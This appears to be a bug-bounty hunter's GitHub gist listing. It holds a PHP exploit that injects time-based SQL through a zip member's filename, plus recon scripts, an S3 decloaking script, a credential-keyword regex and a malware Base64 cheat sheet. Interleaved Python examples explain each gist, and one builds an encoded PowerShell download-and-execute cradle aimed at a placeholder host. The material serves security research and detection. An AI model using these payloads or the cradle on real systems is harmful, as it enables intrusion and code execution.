@bbhunter
bbhunter / exploit.php
Created March 28, 2023 12:13 — forked from mcipekci/exploit.php
Exploiting SQL injection via unzipped file contents
<?php
// Prepare File
$file = tempnam("/tmp", "zip");
$zip = new ZipArchive();
$zip->open($file, ZipArchive::OVERWRITE);
// Add a file whose *name* carries the SQLi payload: the server that unpacks the archive
// writes member names into SQL unescaped. MySQL time-based form: sleep(10) fires when 1=<value> is false
$zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", "");
// Close and send to the server
$zip->close();
$cf = new CURLFile($file);
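The preview above stops before the archive is uploaded; what the attack relies on is a server-side handler that extracts the zip and inserts member names into SQL by string concatenation. The following is an added example, not the gist's code, that reproduces that sink against SQLite so it runs offline: the payload keeps the shape of the gist's filename payload but uses SQLite's `||` concatenation and a `'T'`/`'F'` marker in place of `sleep()` (SQLite has no sleep), turning the same `CASE WHEN 1=<value>` condition into a boolean oracle. The `uploads` table and both handler functions are constructed for illustration; the hardened handler shows the bound-parameter fix.

```python
import io
import sqlite3
import zipfile


def payload(value):
    """SQLite adaptation of the gist's filename payload: the archive member name
    closes the string literal, evaluates CASE WHEN 1=<value>, then reopens it."""
    return "'||(CASE WHEN 1=%d THEN 'T' ELSE 'F' END)||'" % value


def build_zip(member_name):
    """In-memory archive with one empty file whose name is the payload."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, "")
    return buf.getvalue()


def new_db():
    # Constructed schema standing in for whatever the real upload handler records
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE uploads (id INTEGER PRIMARY KEY, filename TEXT)")
    return conn


def record_members_vulnerable(conn, zip_bytes):
    """Hypothetical server handler: member names are interpolated into the SQL text."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            conn.execute("INSERT INTO uploads (filename) VALUES ('%s')" % name)
    conn.commit()


def record_members_hardened(conn, zip_bytes):
    """Same handler with a bound parameter: the name is data, never SQL."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            conn.execute("INSERT INTO uploads (filename) VALUES (?)", (name,))
    conn.commit()


def stored_filenames(conn):
    return [row[0] for row in conn.execute("SELECT filename FROM uploads ORDER BY id")]


def oracle(value, handler):
    """Upload one archive through `handler` and return what ended up in the table.

    Against the vulnerable handler the result is 'T' or 'F', i.e. the attacker
    learns whether 1=<value> held; against the hardened one it is the raw name."""
    conn = new_db()
    handler(conn, build_zip(payload(value)))
    return stored_filenames(conn)[0]


if __name__ == "__main__":
    print(oracle(1, record_members_vulnerable))
    print(oracle(2, record_members_vulnerable))
    print(oracle(1, record_members_hardened))
```

With MySQL the same member name makes the difference observable as a 10-second delay instead of a stored marker; the injection point and the fix are identical.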
bbhunter / Dockerfile
Created November 25, 2022 12:12 — forked from hopsoft/Dockerfile
Dockerize your Rails app
FROM ruby:3.0-alpine
RUN apk add --no-cache --update \
ack \
bash \
build-base \
curl \
git \
htop \
less \
bbhunter / iptables-nat.md
Created November 20, 2022 15:35 — forked from DavidWittman/iptables-nat.md
iptables n'at

Source NAT

Source NAT changes the source address in the IP header of a packet. It may also change the source port in the TCP/UDP header. The typical usage is to change a private (RFC 1918) address/port into a public address/port for packets leaving your network. In iptables the SNAT target is valid only in the nat table, in the POSTROUTING chain (newer kernels also accept it in INPUT). Because the packet has already been routed by then, you match on the outgoing interface with -o; iptables rejects -i in POSTROUTING.

Syntax

iptables -t nat -A POSTROUTING -o eth1 -j SNAT --to-source 1.2.3.4[:port]

Example

bbhunter / crtsh.py
Created November 19, 2022 11:00 — forked from alt-glitch/crtsh.py
Sample script to query crt.sh for certificate transparency log data.
import psycopg2

class CertificateTransparencyLog:
    def __init__(self, base) -> None:
        # crt.sh exposes its certwatch database read-only over PostgreSQL
        # (user guest, no password), so any SQL can be run against the log data
        self.conn = psycopg2.connect(
            host="crt.sh",
            database="certwatch",
            user="guest",
            port="5432",
        )
        self.base = base
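The preview ends at the connection; the useful part of any crt.sh lookup is turning the returned rows into a clean host list. The following is an added example, not the gist's code, and it uses crt.sh's HTTPS JSON endpoint (`?q=%.domain&output=json`) rather than the PostgreSQL connection so the parsing step can be run and tested offline. `name_value` holds every SAN of a certificate separated by newlines, wildcard entries are reduced to their base name, and SANs outside the requested domain (a certificate may cover unrelated names) are dropped. The records are constructed to match the shape of crt.sh's JSON output; the `User-Agent` string is an arbitrary assumption.

```python
import json
import urllib.parse
import urllib.request

CRTSH_JSON = "https://crt.sh/?q={query}&output=json"


def fetch_records(domain, timeout=30.0):
    """Network call: fetch every crt.sh record whose name matches %.domain."""
    url = CRTSH_JSON.format(query=urllib.parse.quote("%." + domain, safe=""))
    req = urllib.request.Request(url, headers={"User-Agent": "ct-lookup-example/0.1"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return json.load(resp)


def hostnames_from_records(records, domain):
    """Sorted, deduplicated, in-scope hostnames from a list of crt.sh records."""
    domain = domain.lower()
    suffix = "." + domain
    found = set()
    for rec in records:
        for name in rec.get("name_value", "").splitlines():
            name = name.strip().lower()
            if name.startswith("*."):
                name = name[2:]           # *.dev.example.com -> dev.example.com
            if name == domain or name.endswith(suffix):
                found.add(name)           # other SANs on the cert are out of scope
    return sorted(found)


# Constructed records in the shape crt.sh returns (fields trimmed for brevity)
SAMPLE_RECORDS = [
    {"id": 1, "issuer_name": "C=US, O=Example CA, CN=Example R1",
     "common_name": "www.example.com",
     "name_value": "www.example.com\nexample.com",
     "not_before": "2023-01-01T00:00:00", "not_after": "2023-04-01T00:00:00"},
    {"id": 2, "issuer_name": "C=US, O=Example CA, CN=Example R1",
     "common_name": "*.dev.example.com",
     "name_value": "*.dev.example.com\napi.dev.example.com\ncdn.partner.net",
     "not_before": "2023-02-01T00:00:00", "not_after": "2023-05-01T00:00:00"},
    {"id": 3, "issuer_name": "C=US, O=Example CA, CN=Example R1",
     "common_name": "EXAMPLE.COM",
     "name_value": "EXAMPLE.COM\nmail.example.com",
     "not_before": "2022-06-01T00:00:00", "not_after": "2022-09-01T00:00:00"},
]


if __name__ == "__main__":
    import sys
    recs = fetch_records(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_RECORDS
    for host in hostnames_from_records(recs, sys.argv[1] if len(sys.argv) > 1 else "example.com"):
        print(host)
```

Run it with a domain argument to hit crt.sh; without one it processes the constructed records. The direct PostgreSQL route in the gist is still the better choice when you need queries the JSON endpoint cannot express (joins on issuer, date ranges, or very large domains that the HTTP endpoint times out on).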
bbhunter / pd_docker_pipeline.sh
Created October 17, 2022 13:24 — forked from FLX-0x00/pd_docker_pipeline.sh
projectdiscovery tools docker pipeline with domain name as input
#!/bin/bash
# first parameter is passed to subfinder as the target domain
docker pull projectdiscovery/nuclei
docker pull projectdiscovery/httpx
docker pull projectdiscovery/naabu
docker pull projectdiscovery/dnsx
docker pull projectdiscovery/subfinder
docker pull projectdiscovery/notify
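The preview shows only the image pulls; the pipeline itself chains the tools so that each container's stdout feeds the next one's stdin, and the first parameter flows straight into a `docker run` command line. The following is an added example, not the gist's script, written in Python so the chaining is explicit and the argument handling can be tested: it validates the domain before it is ever passed to a container (so `example.com; rm -rf /` or `-silent` cannot reach a shell or be parsed as a flag) and then wires the six stages together with real pipes. The flags (`-d` for subfinder's target, `-silent` on every tool, stdin as the input list for the rest) are assumed from the tools' documented CLIs.

```python
import re
import subprocess

# Image names are the ones pulled above; flags are assumed from the tools' CLIs
STAGES = [
    ["subfinder", "-silent", "-d", "{domain}"],
    ["dnsx", "-silent"],
    ["naabu", "-silent"],
    ["httpx", "-silent"],
    ["nuclei", "-silent"],
    ["notify", "-silent"],
]

# DNS-name syntax, one label at a time; a leading '-' can never pass, so the
# argument is never parsed as a flag by the container's entrypoint
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$"
)


def valid_domain(domain):
    return bool(DOMAIN_RE.match(domain.lower()))


def docker_argv(domain):
    """One argv list per stage, each a `docker run` of the matching image."""
    if not valid_domain(domain):
        raise ValueError("refusing to pass %r to docker run" % (domain,))
    argvs = []
    for image, *args in STAGES:
        argv = ["docker", "run", "--rm", "-i", "projectdiscovery/" + image]
        argv += [a.format(domain=domain) for a in args]
        argvs.append(argv)
    return argvs


def run_pipeline(domain):
    """Chain the stages with pipes, like `a | b | c` in the shell.

    Returns the last stage's stdout and the exit code of every stage, so a
    failure in the middle (e.g. naabu lacking NET_RAW) is not silently lost."""
    procs = []
    upstream = subprocess.DEVNULL
    for argv in docker_argv(domain):
        proc = subprocess.Popen(argv, stdin=upstream, stdout=subprocess.PIPE)
        if procs:
            procs[-1].stdout.close()  # let the upstream tool see SIGPIPE on exit
        procs.append(proc)
        upstream = proc.stdout
    output = procs[-1].communicate()[0].decode()
    return output, [p.wait() for p in procs]


if __name__ == "__main__":
    import sys
    out, codes = run_pipeline(sys.argv[1])
    print(out, end="")
    sys.exit(max(codes))
```

`subprocess.Popen` is given argv lists, never a shell string, so the domain is an argument and not shell syntax; the regex check is still needed because the tools themselves parse their arguments.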
bbhunter / bucket-disclose.sh
Created October 12, 2022 09:23 — forked from jhaddix/bucket-disclose.sh
Using error messages to decloak an S3 bucket. Uses SOAP, unicode, POST, multipart, streaming and index listing as ways of figuring it out. You do need a valid AWS key (never the secret) to properly get the error messages.
#!/bin/bash
# Written by Frans Rosén (twitter.com/fransrosen)
_debug="$2" #turn on debug
_timeout="20"
#you need a valid key, since the errors happen only after AWS has validated that the key exists. we do not need the secret key, only the access key
_aws_key="AKIA..."
H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"
bbhunter / MutateMethods.py
Created May 28, 2022 17:41 — forked from defparam/MutateMethods.py
Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.
import time

# Turbo Intruder runs inside Burp's Jython, so `burp` (the extender API) and
# `callbacks` are provided by the host and need no import here.
class TrafficMagnet(burp.IProxyListener):
    def __init__(self, engine):
        callbacks.registerProxyListener(self)
        self._engine = engine
        # Host of the attack target, used to pick out matching proxied requests
        self._target = str(self._engine.engine.getTarget()).lower().replace("https:","").replace("http:","").replace("/","").split(':')[0]

    def listen(self):
        while True:

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k
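The keyword alternation above is the start of a credential-name regex; on its own it only tells you that a name like `api_key` appears somewhere. The following is an added example, not part of the gist, that takes a short subset of those keywords and anchors them to a following value so the pattern reports assignments rather than mentions, skips obvious template values, and offers a redaction helper for logging the hit without logging the secret. The keyword subset, placeholder list and sample config lines are constructed; the access key and secret in the sample are the AWS documentation's example credentials.

```python
import re

# Subset of the keyword alternation above; the full list is much longer
KEYWORDS = (
    "access_key|api_key|aws_access_key_id|aws_secret_key|"
    "client_secret|cloudflare_api_key|auth_token"
)
# group 1: keyword; group 2: value. Quotes optional, '=' or ':' as separator,
# value must be at least 8 chars of base64/path-safe material.
SECRET_RE = re.compile(
    r"(?i)\b(" + KEYWORDS + r")\b[\"']?\s*[:=]\s*[\"']?([A-Za-z0-9/+_.\-]{8,})"
)
# values that are clearly templates rather than leaked material (constructed list)
PLACEHOLDERS = {"changeme", "password", "your_key_here", "xxxxxxxx", "replaceme"}


def find_secrets(text):
    """Return (keyword, value) pairs for every credential-looking assignment."""
    hits = []
    for m in SECRET_RE.finditer(text):
        value = m.group(2)
        if value.lower() in PLACEHOLDERS or len(set(value)) < 4:
            continue  # template value or a run like 'xxxxxxxx'
        hits.append((m.group(1).lower(), value))
    return hits


def redact(text):
    """Keep the keyword and separator, replace the value, so hits can be logged."""
    def repl(m):
        keep = m.start(2) - m.start(0)
        return m.group(0)[:keep] + "[REDACTED]"
    return SECRET_RE.sub(repl, text)


# Constructed sample .env / config lines
SAMPLE = """\
# application settings
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
aws_secret_key: "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
client_secret = changeme
"api_key": "sk_live_EXAMPLE1234567890"
max_keys = 1000
"""


if __name__ == "__main__":
    for name, value in find_secrets(SAMPLE):
        print(name, value)
    print(redact(SAMPLE))
```

The `\b` on both sides of the keyword is what stops `access_key` from firing inside `aws_access_key_id` and `api_key` inside `max_keys`; the bare alternation above has no such anchoring and will match substrings.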
bbhunter / Base64_CheatSheet.md
Created March 14, 2022 12:39 — forked from Neo23x0/Base64_CheatSheet.md
Learning Aid - Top Base64 Encodings Table

| Base64 Code | Mnemonic Aid | Decoded* | Description |
| --- | --- | --- | --- |
| JAB | 🗣 Jabber | $. | Variable declaration (UTF-16) |
| TVq | 📺 Television | MZ | MZ header |
| SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
| PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |
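Each marker in the table is the prefix that base64 produces for a known plaintext start, but because three plaintext bytes map to four base64 characters, a marker is only stable for the characters fully determined by bytes you actually know. The following is an added example, not part of the cheat sheet, that recomputes the markers from their plaintext and makes each one's hidden assumption explicit: `TVq` relies on the usual `0x90` third byte of an MZ header (from `MZ` alone only `TV` is fixed), `JAB` holds for `$` followed by any identifier character, and `SQBuAH` specifically assumes `In` followed by a letter in the `p`-`w` range such as the `v` of `Invoke`. A small scanner then applies the markers to base64 tokens in a command line; the sample command is constructed.

```python
import base64
import re
import string


def common_base64_prefix(candidates):
    """Longest prefix shared by the base64 encodings of all candidate plaintext starts."""
    encoded = [base64.b64encode(c).decode("ascii") for c in candidates]
    prefix = encoded[0]
    for enc in encoded[1:]:
        n = 0
        while n < min(len(prefix), len(enc)) and prefix[n] == enc[n]:
            n += 1
        prefix = prefix[:n]
    return prefix


def marker(text, followers="", utf16=False):
    """Marker for `text` followed by any one of `followers` (or by nothing).

    Non-UTF-16 text is encoded as latin-1 so raw bytes such as '\\x90' can be
    written as characters; utf16=True models PowerShell's -EncodedCommand input."""
    codec = "utf-16-le" if utf16 else "latin-1"
    starts = [text + f for f in followers] or [text]
    return common_base64_prefix([s.encode(codec) for s in starts])


IDENTIFIER = string.ascii_letters + "_"

# The table's markers recomputed, keyed by the full stable prefix
MARKERS = {
    marker("MZ\x90"): "MZ header (assumes the usual 0x90 third byte)",
    marker("$", IDENTIFIER, utf16=True): "PowerShell variable (UTF-16)",
    marker("IEX"): "Invoke-Expression",
    marker("IEX", utf16=True): "Invoke-Expression (UTF-16)",
    marker("Inv", utf16=True): "Invoke-* cmdlet (UTF-16)",
    marker("<", "?! ", utf16=True): "XML/HTML start, Emotet-style (UTF-16)",
}

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_markers(text):
    """(marker, description) for every base64-looking token that starts with a marker.

    Only the start of a blob is checked: if the interesting text begins mid-blob
    the alignment shifts and none of these prefixes apply."""
    hits = []
    for tok in B64_TOKEN.findall(text):
        for mk, desc in MARKERS.items():
            if tok.startswith(mk):
                hits.append((mk, desc))
    return hits


# Constructed sample: a typical encoded PowerShell one-liner
SAMPLE_COMMAND = "powershell -nop -w hidden -enc " + base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode("ascii")


if __name__ == "__main__":
    for mk, desc in MARKERS.items():
        print(mk, desc)
    print(find_markers(SAMPLE_COMMAND))
```

The table truncates some markers (`SQBFAF` for the full `SQBFAFgA`) which is safe since a shorter prefix matches a superset; the reverse, extending a marker past the bytes you know, is what produces false negatives.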
bbhunter / cli.php
Created March 1, 2022 11:03 — forked from PinkDraconian/cli.php
Can you spot the vulnerability?
<?php
if (!isset($_SERVER['argc']) || $_SERVER['argc'] < 1) {
    die("Usage: cli <action> <options>");
}
$argc = $_SERVER['argc'];
$argv = $_SERVER['argv'];
switch ($argv[1]) {
    case "ls":
        echo "Listing directory";